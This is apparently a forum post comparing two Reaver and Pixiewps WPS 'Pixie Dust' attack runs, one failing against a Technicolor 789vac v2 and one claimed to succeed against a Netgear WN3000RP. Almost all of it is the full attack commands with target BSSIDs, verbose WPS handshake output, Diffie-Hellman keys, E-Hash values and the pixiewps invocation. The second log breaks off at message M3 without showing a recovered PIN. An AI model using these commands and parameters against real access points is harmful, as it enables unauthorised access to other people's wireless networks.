2 pixie attacks same kind of output but 1 out of 2 successful

A) technicolor 789vac v2 - No success

reaver -i wlan1 -c 112 -b  XX XX XX:8B:26:44 -vvv -L -N -K                                                                  130 ⨯

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan1 to channel 112
[+] Waiting for beacon from XX XX XX:8B:26:44
[+] Received beacon from XX XX XX:8B:26:44
[+] Vendor: Broadcom
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:380
send_packet called from authenticate() 80211.c:411
[+] Sending authentication request
send_packet called from associate() 80211.c:464
[+] Sending association request
[+] Associated with XX XX XX:8B:26:44 (ESSID: tech-234431)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=407 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 1d a5 f2 67 ba e1 5c d9 a0 49 fb ee 1c 4a 72 53
WPS: Enrollee MAC Address a6:91:b1:8b:26:44
WPS: Enrollee Nonce - hexdump(len=16): 16 fa 86 5d 41 b7 69 5e 91 c4 ff 5b 4a 77 a2 1d
WPS: Enrollee Authentication Type flags 0x23
WPS: No match in supported authentication types (own 0x0 Enrollee 0x23)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0xd
WPS: No match in supported encryption types (own 0x0 Enrollee 0xd)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x268c [Label] [Display] [PBC]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=11):
     54 65 63 68 6e 69 63 6f 6c 6f 72                  Technicolor     
WPS: Model Name - hexdump_ascii(len=14):
     4d 65 64 69 61 41 63 63 65 73 73 20 54 47         MediaAccess TG  
WPS: Model Number - hexdump_ascii(len=9):
     37 38 39 76 61 63 20 76 32                        789vac v2       
WPS: Serial Number - hexdump_ascii(len=9):
     31 38 33 38 55 41 30 4b 41                        1838UA0KA       
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=7):
     41 47 43 4f 4d 42 4f                              AGCOMBO         
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): a2 51 69 11 2e c1 9e bd 94 b6 54 43 b9 2b d1 a0
WPS: UUID-R - hexdump(len=16): 17 46 85 02 ed 02 ae 3e 5a b8 ae cb a4 7d e0 00
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): 46 43 68 9a 43 73 3b 91 e3 a0 ea d8 7e 51 eb 3e 4d aa 59 58 c7 03 dd fb 87 58 b9 cf c3 cb 52 61 30 8e 9d 26 60 2b fc d1 5e 1e 10 a1 c7 d7 75 8a c5 d8 06 ee fd 1c 2d 4b e7 64 0b 82 05 49 1f d3 ec fc 00 5c 11 67 75 52 2b bd 79 26 43 c9 8f 24 de 68 4c f1 5b 1b 25 fe ba 73 b5 b9 96 39 e8 7f 99 47 b1 a7 22 1a d6 ad 16 d6 4b 32 50 2c f1 97 1a d6 49 93 cf a6 7a 54 6a cd eb dd 02 e3 ea 22 71 48 d4 b6 59 85 f2 91 b3 2b eb b5 16 e8 fc 59 98 bc 48 81 06 b8 56 3a 8b 5b 1f fc 13 96 bf 25 71 bb 86 7e 9a b8 87 d6 0d 60 b3 f3 d2 23 cf e2 25 ab 74 12 0b 25 e9 20 4a 94 91 5b 1a cf 45 ee
DH: public value - hexdump(len=192): 54 8f 0f cd 9d 43 47 71 c6 78 7d 17 1e 3c 15 52 bb 08 13 1c 1d 6a 31 20 b5 ad 63 4f 7f 5e 0a 56 4f 4f 04 60 5e b4 0f 9f 96 38 69 7c 6f 6c ee 10 d7 3f 2e e0 a3 c3 9e 5e 85 2a 19 9e 62 4b e9 75 92 69 98 b0 c2 ce 9b f8 51 b7 31 a2 62 14 06 4b ca c8 e8 85 90 a8 a4 91 4d 8f e3 d3 24 f1 b2 21 2e 7e a4 e2 86 27 67 a1 f2 fd 19 7e cc 6c 5c 80 9a 3c ba 97 60 27 4a 42 2c bc cf e1 71 aa c8 f1 76 9a f2 a9 31 40 b5 2c 59 06 5b ea 1d d1 fe d8 23 33 b8 e8 4b 0c 5b 5a 34 0f 7f 4a 91 2c 73 1d 85 d8 ab a0 c8 4d 53 8e a0 ef c4 b0 3e be 1b 75 5d 64 07 24 fc a5 32 af 0d 56 c2 7e 89 63 12 09
WPS: DH Private Key - hexdump(len=192): 46 43 68 9a 43 73 3b 91 e3 a0 ea d8 7e 51 eb 3e 4d aa 59 58 c7 03 dd fb 87 58 b9 cf c3 cb 52 61 30 8e 9d 26 60 2b fc d1 5e 1e 10 a1 c7 d7 75 8a c5 d8 06 ee fd 1c 2d 4b e7 64 0b 82 05 49 1f d3 ec fc 00 5c 11 67 75 52 2b bd 79 26 43 c9 8f 24 de 68 4c f1 5b 1b 25 fe ba 73 b5 b9 96 39 e8 7f 99 47 b1 a7 22 1a d6 ad 16 d6 4b 32 50 2c f1 97 1a d6 49 93 cf a6 7a 54 6a cd eb dd 02 e3 ea 22 71 48 d4 b6 59 85 f2 91 b3 2b eb b5 16 e8 fc 59 98 bc 48 81 06 b8 56 3a 8b 5b 1f fc 13 96 bf 25 71 bb 86 7e 9a b8 87 d6 0d 60 b3 f3 d2 23 cf e2 25 ab 74 12 0b 25 e9 20 4a 94 91 5b 1a cf 45 ee
WPS: DH own Public Key - hexdump(len=192): 54 8f 0f cd 9d 43 47 71 c6 78 7d 17 1e 3c 15 52 bb 08 13 1c 1d 6a 31 20 b5 ad 63 4f 7f 5e 0a 56 4f 4f 04 60 5e b4 0f 9f 96 38 69 7c 6f 6c ee 10 d7 3f 2e e0 a3 c3 9e 5e 85 2a 19 9e 62 4b e9 75 92 69 98 b0 c2 ce 9b f8 51 b7 31 a2 62 14 06 4b ca c8 e8 85 90 a8 a4 91 4d 8f e3 d3 24 f1 b2 21 2e 7e a4 e2 86 27 67 a1 f2 fd 19 7e cc 6c 5c 80 9a 3c ba 97 60 27 4a 42 2c bc cf e1 71 aa c8 f1 76 9a f2 a9 31 40 b5 2c 59 06 5b ea 1d d1 fe d8 23 33 b8 e8 4b 0c 5b 5a 34 0f 7f 4a 91 2c 73 1d 85 d8 ab a0 c8 4d 53 8e a0 ef c4 b0 3e be 1b 75 5d 64 07 24 fc a5 32 af 0d 56 c2 7e 89 63 12 09
WPS: DH Private Key - hexdump(len=192): 46 43 68 9a 43 73 3b 91 e3 a0 ea d8 7e 51 eb 3e 4d aa 59 58 c7 03 dd fb 87 58 b9 cf c3 cb 52 61 30 8e 9d 26 60 2b fc d1 5e 1e 10 a1 c7 d7 75 8a c5 d8 06 ee fd 1c 2d 4b e7 64 0b 82 05 49 1f d3 ec fc 00 5c 11 67 75 52 2b bd 79 26 43 c9 8f 24 de 68 4c f1 5b 1b 25 fe ba 73 b5 b9 96 39 e8 7f 99 47 b1 a7 22 1a d6 ad 16 d6 4b 32 50 2c f1 97 1a d6 49 93 cf a6 7a 54 6a cd eb dd 02 e3 ea 22 71 48 d4 b6 59 85 f2 91 b3 2b eb b5 16 e8 fc 59 98 bc 48 81 06 b8 56 3a 8b 5b 1f fc 13 96 bf 25 71 bb 86 7e 9a b8 87 d6 0d 60 b3 f3 d2 23 cf e2 25 ab 74 12 0b 25 e9 20 4a 94 91 5b 1a cf 45 ee
WPS: DH peer Public Key - hexdump(len=192): 05 0f 7d ef 73 79 fe ff c1 c3 1b da 34 15 8c a6 0a 84 b1 6f e9 ab c2 5d 1f 1d 3c 1e 27 76 20 39 24 82 86 5f fb a9 e8 1f cf 54 35 71 bc b8 09 2e 6f 4b 92 82 6b 9d 25 50 2c 80 e8 b7 a5 ad e3 17 a7 08 8e d6 14 95 6e 2e 5c 72 f8 37 fb 08 79 1a ac c8 d8 2a 29 69 fd 6e 5c 9c 19 23 9d b2 da a8 b4 5c a8 24 b7 d5 ec ef 7c 7b b7 f5 e1 54 21 4a 4a 33 8d 51 d3 12 d6 6b bb 85 6f 02 f6 cd 03 ed f6 09 96 f4 6c 96 a0 a8 8d 0f 70 2d ea 88 a1 cc f0 35 27 21 76 85 e9 3e ac 32 6c 5f b8 c6 d5 19 8e 7b b2 43 98 87 0b 5a 62 a2 46 41 a4 86 1e 75 98 85 66 39 f0 f2 ae 60 ac 88 1b f3 1d a8 43 40
DH: shared key - hexdump(len=192): 9a 74 84 0d 24 94 31 55 5d c2 4e 4c be 84 d9 95 9e 69 dc 9d 36 1e 3c 09 05 d8 9d f9 82 15 9a a9 71 46 48 8e f0 09 f6 98 2c 2a e3 87 f3 f5 0e 50 50 0d 4d 81 97 3e 27 0a 20 4f 09 6f 87 e9 86 1f 3f b5 17 56 32 76 cb 5b 63 bb 73 5f 3f db 31 7d 7f 12 e1 a6 f2 49 fc 46 c7 f2 72 53 02 d1 4f 80 07 2a 6e d5 f4 b6 ab 95 09 70 9f 77 71 38 85 36 6c 22 b1 cf d5 a4 e4 ef 41 ba a2 db 3b b2 68 f2 a3 f3 52 33 67 2f 42 a5 84 a4 37 b8 46 d3 d5 68 f5 09 89 0b ae af dd 79 23 8c a2 c9 44 ee 8f 02 c8 50 c2 21 4a fd 37 de f5 c9 b9 35 f4 8e 00 b1 2b 31 cc 82 2e 52 90 06 5c 47 58 e7 57 e8 e1 57
WPS: DH shared key - hexdump(len=192): 9a 74 84 0d 24 94 31 55 5d c2 4e 4c be 84 d9 95 9e 69 dc 9d 36 1e 3c 09 05 d8 9d f9 82 15 9a a9 71 46 48 8e f0 09 f6 98 2c 2a e3 87 f3 f5 0e 50 50 0d 4d 81 97 3e 27 0a 20 4f 09 6f 87 e9 86 1f 3f b5 17 56 32 76 cb 5b 63 bb 73 5f 3f db 31 7d 7f 12 e1 a6 f2 49 fc 46 c7 f2 72 53 02 d1 4f 80 07 2a 6e d5 f4 b6 ab 95 09 70 9f 77 71 38 85 36 6c 22 b1 cf d5 a4 e4 ef 41 ba a2 db 3b b2 68 f2 a3 f3 52 33 67 2f 42 a5 84 a4 37 b8 46 d3 d5 68 f5 09 89 0b ae af dd 79 23 8c a2 c9 44 ee 8f 02 c8 50 c2 21 4a fd 37 de f5 c9 b9 35 f4 8e 00 b1 2b 31 cc 82 2e 52 90 06 5c 47 58 e7 57 e8 e1 57
WPS: DHKey - hexdump(len=32): 67 35 fa 65 bc 9c 4a 4e 8b ba 32 3d d0 14 fd 50 ac 61 e9 f9 c3 41 22 9b 85 d1 c1 c2 16 f3 46 6c
WPS: KDK - hexdump(len=32): dc bb b8 2f 93 95 64 9d ba 92 5b 87 14 51 9e d6 1a f8 c0 c0 d0 a9 28 b0 61 4a 78 c6 61 51 50 66
WPS: AuthKey - hexdump(len=32): 59 a0 4e 42 28 66 30 9c 03 aa a4 76 99 82 0d cc 0e 1c 68 7f 46 59 4d 1b f4 0e fc 7e 51 78 3c b7
WPS: KeyWrapKey - hexdump(len=16): 0d 21 fa 32 fe d7 2f 4b 99 2d d6 e9 6e 5d ec 6d
WPS: EMSK - hexdump(len=32): 45 2a b5 d9 91 e4 d6 de 9c 33 d9 24 13 24 2b 71 40 6d 8a ed 7b 85 4b a6 7f 5a 98 3d e5 a5 b3 d0
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (0)
WPS:  * Association State
WPS:  * Configuration Error (0)
WPS:  * Device Password ID (0)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 4d 5d f1 ea b0 3a 25 8e 73 57 88 de 0b 19 40 ff 71 be 14 6b 96 1e 32 ec 6c 2e 25 d4 cd 83 1c b0
WPS: E-Hash2 - hexdump(len=32): 61 4f dc f6 f7 ad be d3 1e bf ec 57 48 22 78 a8 de 86 e6 55 c0 6c f0 4c a4 ba 9d d6 9e bf 58 df
executing pixiewps -e 050f7def7379feffc1c31bda34158ca60a84b16fe9abc25d1f1d3c1e277620392482865ffba9e81fcf543571bcb8092e6f4b92826b9d25502c80e8b7a5ade317a7088ed614956e2e5c72f837fb08791aacc8d82a2969fd6e5c9c19239db2daa8b45ca824b7d5ecef7c7bb7f5e154214a4a338d51d312d66bbb856f02f6cd03edf60996f46c96a0a88d0f702dea88a1ccf03527217685e93eac326c5fb8c6d5198e7bb24398870b5a62a24641a4861e7598856639f0f2ae60ac881bf31da84340 -s 4d5df1eab03a258e735788de0b1940ff71be146b961e32ec6c2e25d4cd831cb0 -z 614fdcf6f7adbed31ebfec57482278a8de86e655c06cf04ca4ba9dd69ebf58df -a 59a04e422866309c03aaa47699820dcc0e1c687f46594d1bf40efc7e51783cb7 -n 16fa865d41b7695e91c4ff5b4a77a21d -r 548f0fcd9d434771c6787d171e3c1552bb08131c1d6a3120b5ad634f7f5e0a564f4f04605eb40f9f9638697c6f6cee10d73f2ee0a3c39e5e852a199e624be975926998b0c2ce9bf851b731a26214064bcac8e88590a8a4914d8fe3d324f1b2212e7ea4e2862767a1f2fd197ecc6c5c809a3cba9760274a422cbccfe171aac8f1769af2a93140b52c59065bea1dd1fed82333b8e84b0c5b5a340f7f4a912c731d85d8aba0c84d538ea0efc4b03ebe1b755d640724fca532af0d56c27e89631209

 Pixiewps 1.4

 [-] WPS pin not found!

 [*] Time taken: 0 s 170 ms

[-] Pixiewps fail, sending WPS NACK
WPS: Building Message WSC_NACK
WPS:  * Version
WPS:  * Message Type (14)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116

B) Netgear WN3000RP : Successful pin recovery

sudo reaver -i wlan1 -c 6 -b   A0:40:A0:6C:BB:6F  -vvv -L -N -K                                                                    1 ⨯

Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Switching wlan1 to channel 6
[?] Restore previous session for A0:40:A0:6C:BB:6F? [n/Y] n
[+] Waiting for beacon from A0:40:A0:6C:BB:6F
[+] Received beacon from A0:40:A0:6C:BB:6F
[+] Vendor: RalinkTe
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
     31 32 33 34 35 36 37 30                           12345670        
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:380
send_packet called from authenticate() 80211.c:411
[+] Sending authentication request
send_packet called from resend_last_packet() send.c:161
send_packet called from associate() 80211.c:464
[+] Sending association request
[+] Associated with A0:40:A0:6C:BB:6F (ESSID: tp-linkAD234CBA)
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=406 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): 28 80 28 80 28 80 18 80 a8 80 a0 40 a0 6c bb 6f
WPS: Enrollee MAC Address a0:40:a0:6c:bb:6f
WPS: Enrollee Nonce - hexdump(len=16): 8a 09 53 f8 9c e8 a6 46 79 d9 a8 80 dd 08 7f b0
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x238c [Label] [Display] [PBC] [Keypad]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=4):
     4e 54 47 52                                       NTGR            
WPS: Model Name - hexdump_ascii(len=8):
     57 4e 33 30 30 30 52 50                           WN3000RP        
WPS: Model Number - hexdump_ascii(len=2):
     56 33                                             V3              
WPS: Serial Number - hexdump_ascii(len=12):
     61 30 34 30 61 30 36 63 62 62 36 66               a040a06cbb6f    
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=23):
     57 4e 33 30 30 30 52 50 76 33 28 57 69 72 65 6c   WN3000RPv3(Wirel
     65 73 73 20 41 50 29                              ess AP)         
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 0
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: dev_pw_id checked
WPS: PBC Checked
WPS: Entering State SEND_M2
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): ee 0d 75 2f 66 3d d2 0d cf 89 e4 b6 4e 50 d7 13
WPS: UUID-R - hexdump(len=16): c4 23 4c 61 7d 23 3d 46 c6 ff ac a9 c4 97 c7 0e
WPS: Building Message M2
WPS:  * Version
WPS:  * Message Type (5)
WPS:  * Enrollee Nonce
WPS:  * Registrar Nonce
WPS:  * UUID-R
WPS:  * Public Key
WPS: Generate new DH keys
DH: private value - hexdump(len=192): c2 51 df 92 53 0b 7f 3f 49 6e c1 bd 6f b1 2e 5b 65 52 6d 87 50 e3 40 21 6d 3a 53 de b4 1d 1f 7f 09 44 81 4d 0e 21 d3 54 0f 61 64 4f 31 c7 32 cb 55 48 5e e1 e4 ff 0c 53 b8 df 00 88 23 7c cb 45 2a f9 34 67 83 43 55 28 ee 2b 6d fa 63 72 07 14 76 3e c5 09 1a e7 42 8e e8 19 5c f9 67 36 43 dd 42 c5 21 40 81 d4 91 2e 56 8e 3f 3b fe 08 98 18 37 85 fd 13 3e ec ee 52 f6 ca 66 a3 7b cb c2 26 b0 28 13 22 7c da 3e 4d 9a 4e 9e 62 7a 52 64 fc 9f 29 eb 66 41 e4 98 d7 43 c9 b5 eb 41 5c df 05 f6 d7 a2 8c 20 9e fc b6 ef 16 51 6b d5 c8 a3 29 0f 20 f4 94 5d 5c 3b c6 3e e1 3a 6d 5d e1 33 cc
DH: public value - hexdump(len=192): 18 d5 cf 9a a2 c4 0e c0 03 be 8e 0f 75 27 69 1b 0d dd b9 c9 f2 71 5d 08 93 cd cf f8 64 36 c1 60 c3 b0 12 24 9a 5d c5 1c f3 83 1f d3 c3 fd 66 03 10 80 e7 4b 5c e4 8e 7e 54 f8 34 50 e3 10 e7 14 8d 01 ff c4 de b6 29 a4 06 82 5f 96 6a 3d 6c bb fd 74 30 2f 46 cb 4a ca 88 9d 91 28 dd e1 94 21 d6 99 09 00 8b 51 69 ed b1 00 8b 8b 67 48 3b d4 86 e7 63 85 fd 8b 18 04 42 8d c8 b3 0f f4 b9 71 71 70 60 28 02 3c 33 e3 5b bc 79 5c f0 21 43 b2 03 3c 65 c7 d4 b0 a1 f5 71 c2 a7 14 2d 14 2e 88 2d 6b 70 ae fc 99 c7 00 c5 59 87 ae f2 c5 4f a0 75 85 80 f9 22 2e a6 f0 8d 23 50 ed d4 60 73 3a
WPS: DH Private Key - hexdump(len=192): c2 51 df 92 53 0b 7f 3f 49 6e c1 bd 6f b1 2e 5b 65 52 6d 87 50 e3 40 21 6d 3a 53 de b4 1d 1f 7f 09 44 81 4d 0e 21 d3 54 0f 61 64 4f 31 c7 32 cb 55 48 5e e1 e4 ff 0c 53 b8 df 00 88 23 7c cb 45 2a f9 34 67 83 43 55 28 ee 2b 6d fa 63 72 07 14 76 3e c5 09 1a e7 42 8e e8 19 5c f9 67 36 43 dd 42 c5 21 40 81 d4 91 2e 56 8e 3f 3b fe 08 98 18 37 85 fd 13 3e ec ee 52 f6 ca 66 a3 7b cb c2 26 b0 28 13 22 7c da 3e 4d 9a 4e 9e 62 7a 52 64 fc 9f 29 eb 66 41 e4 98 d7 43 c9 b5 eb 41 5c df 05 f6 d7 a2 8c 20 9e fc b6 ef 16 51 6b d5 c8 a3 29 0f 20 f4 94 5d 5c 3b c6 3e e1 3a 6d 5d e1 33 cc
WPS: DH own Public Key - hexdump(len=192): 18 d5 cf 9a a2 c4 0e c0 03 be 8e 0f 75 27 69 1b 0d dd b9 c9 f2 71 5d 08 93 cd cf f8 64 36 c1 60 c3 b0 12 24 9a 5d c5 1c f3 83 1f d3 c3 fd 66 03 10 80 e7 4b 5c e4 8e 7e 54 f8 34 50 e3 10 e7 14 8d 01 ff c4 de b6 29 a4 06 82 5f 96 6a 3d 6c bb fd 74 30 2f 46 cb 4a ca 88 9d 91 28 dd e1 94 21 d6 99 09 00 8b 51 69 ed b1 00 8b 8b 67 48 3b d4 86 e7 63 85 fd 8b 18 04 42 8d c8 b3 0f f4 b9 71 71 70 60 28 02 3c 33 e3 5b bc 79 5c f0 21 43 b2 03 3c 65 c7 d4 b0 a1 f5 71 c2 a7 14 2d 14 2e 88 2d 6b 70 ae fc 99 c7 00 c5 59 87 ae f2 c5 4f a0 75 85 80 f9 22 2e a6 f0 8d 23 50 ed d4 60 73 3a
WPS: DH Private Key - hexdump(len=192): c2 51 df 92 53 0b 7f 3f 49 6e c1 bd 6f b1 2e 5b 65 52 6d 87 50 e3 40 21 6d 3a 53 de b4 1d 1f 7f 09 44 81 4d 0e 21 d3 54 0f 61 64 4f 31 c7 32 cb 55 48 5e e1 e4 ff 0c 53 b8 df 00 88 23 7c cb 45 2a f9 34 67 83 43 55 28 ee 2b 6d fa 63 72 07 14 76 3e c5 09 1a e7 42 8e e8 19 5c f9 67 36 43 dd 42 c5 21 40 81 d4 91 2e 56 8e 3f 3b fe 08 98 18 37 85 fd 13 3e ec ee 52 f6 ca 66 a3 7b cb c2 26 b0 28 13 22 7c da 3e 4d 9a 4e 9e 62 7a 52 64 fc 9f 29 eb 66 41 e4 98 d7 43 c9 b5 eb 41 5c df 05 f6 d7 a2 8c 20 9e fc b6 ef 16 51 6b d5 c8 a3 29 0f 20 f4 94 5d 5c 3b c6 3e e1 3a 6d 5d e1 33 cc
WPS: DH peer Public Key - hexdump(len=192): a0 74 ad 2e 4d e7 86 d8 c0 b2 12 a9 9f a3 be 24 ac 68 2d 67 48 9c de 27 db da 3a 7e 00 41 66 95 81 ca b1 8d 9f 4b af 43 ca 32 81 1d a7 01 6d 09 97 69 6d 6e e7 f3 1a c6 15 f4 fa ca 62 e9 54 6e d6 1e d5 20 84 66 10 df 9c 05 99 80 f9 e9 25 1a fa ee 9c f3 a8 51 23 79 2f 19 e3 ac f7 a4 5f 22 a8 a9 4a 6a da 72 b4 fe 6a 94 f5 0e a4 8d b1 b9 07 c5 58 31 4e 42 dd e5 10 df 6a 56 b0 ad b8 35 fb 18 53 6d 5e 2b b9 fb 3e 1f 03 8f 91 7a f8 b6 e0 77 e5 a4 be 39 e2 11 cf e2 6c 44 79 b2 e0 55 1a 8d dd d9 f4 4d d8 c6 45 93 a0 07 bf 9c 11 e6 bd 80 66 2c d8 35 8e 5a 9a d0 2f 50 eb 86 01 f3
DH: shared key - hexdump(len=192): 3f d5 85 e4 6d 63 26 d8 c9 67 30 bc 40 73 b2 ce 6c 43 d6 32 4c 38 29 76 1a c9 e3 8a 87 5b c6 cb fe 96 cc 68 aa a3 c9 f3 d9 4b 82 f3 db cd 40 d7 ce 56 17 fd 6d 6a 36 4f d0 cc 38 04 95 2f c8 9b 23 4f 9e 80 97 99 32 a2 21 b0 38 ce 96 50 03 c0 04 f3 08 88 01 66 9d 4e af 98 7e 17 47 62 3a ff 67 65 14 62 88 6f c9 d1 5f 7e 7a 7c 5c b3 db 49 3d ff 4b 69 2e 71 12 97 6c d4 b8 ff de 1d 2a c3 42 ec ac b0 da 22 b5 3f f9 e5 a4 6e b0 04 37 40 02 f6 cd da b0 ee 2f dc f5 fb c6 a0 69 48 1a b2 55 ff 36 44 28 c2 c2 61 d1 33 8a a9 7e 4b 1a a3 d3 96 02 96 b6 e1 73 93 c4 60 b0 4b 2d 88 49 dc
WPS: DH shared key - hexdump(len=192): 3f d5 85 e4 6d 63 26 d8 c9 67 30 bc 40 73 b2 ce 6c 43 d6 32 4c 38 29 76 1a c9 e3 8a 87 5b c6 cb fe 96 cc 68 aa a3 c9 f3 d9 4b 82 f3 db cd 40 d7 ce 56 17 fd 6d 6a 36 4f d0 cc 38 04 95 2f c8 9b 23 4f 9e 80 97 99 32 a2 21 b0 38 ce 96 50 03 c0 04 f3 08 88 01 66 9d 4e af 98 7e 17 47 62 3a ff 67 65 14 62 88 6f c9 d1 5f 7e 7a 7c 5c b3 db 49 3d ff 4b 69 2e 71 12 97 6c d4 b8 ff de 1d 2a c3 42 ec ac b0 da 22 b5 3f f9 e5 a4 6e b0 04 37 40 02 f6 cd da b0 ee 2f dc f5 fb c6 a0 69 48 1a b2 55 ff 36 44 28 c2 c2 61 d1 33 8a a9 7e 4b 1a a3 d3 96 02 96 b6 e1 73 93 c4 60 b0 4b 2d 88 49 dc
WPS: DHKey - hexdump(len=32): 1a 00 8d 4e eb b7 cc 13 b2 60 15 83 93 02 2e e6 c2 12 ac b1 d3 8f 1e e6 01 1d 4e 48 5b 4d bd 89
WPS: KDK - hexdump(len=32): 9b 80 bb 4a 17 7c 19 99 84 05 c3 ce ca 17 7a 8c 2e da e6 75 56 37 23 0e 07 0c 07 37 d0 4a 3d 3b
WPS: AuthKey - hexdump(len=32): f5 50 7d dc 01 c2 10 4d 92 fa 78 ef c9 ed 98 88 de ea ec 2f f3 bf 95 8e ee d7 35 76 36 6d 41 e4
WPS: KeyWrapKey - hexdump(len=16): ab 04 3d 17 1b f8 c1 4a 3d 98 3f 0b 9c 97 4b db
WPS: EMSK - hexdump(len=32): 2b e4 be 26 b0 88 31 b2 ab cf 0c 1c f0 8c 18 ef 24 09 5e c5 f0 73 58 40 88 c2 58 11 af 96 21 97
WPS:  * Authentication Type Flags
WPS:  * Encryption Type Flags
WPS:  * Connection Type Flags
WPS:  * Config Methods (8c)
WPS:  * Manufacturer
WPS:  * Model Name
WPS:  * Model Number
WPS:  * Serial Number
WPS:  * Primary Device Type
WPS:  * Device Name
WPS:  * RF Bands (0)
WPS:  * Association State
WPS:  * Configuration Error (0)
WPS:  * Device Password ID (0)
WPS:  * OS Version
WPS:  * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=124 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M3
WPS: E-Hash1 - hexdump(len=32): 83 1c 77 ec 56 d6 17 70 c3 a0 23 27 0c 7a 12 58 28 7a 22 0d 15 ad a9 b2 d1 9d 2e 36 5c 19 84 3e
WPS: E-Hash2 - hexdump(len=32): 88 30 3d ac 90 d1 f4 ce ac e3 48 06 4a c1 ed c9 d0 59 13 7b e3 4c bb b3 d1 c2 8a 90 78 00 4d 28
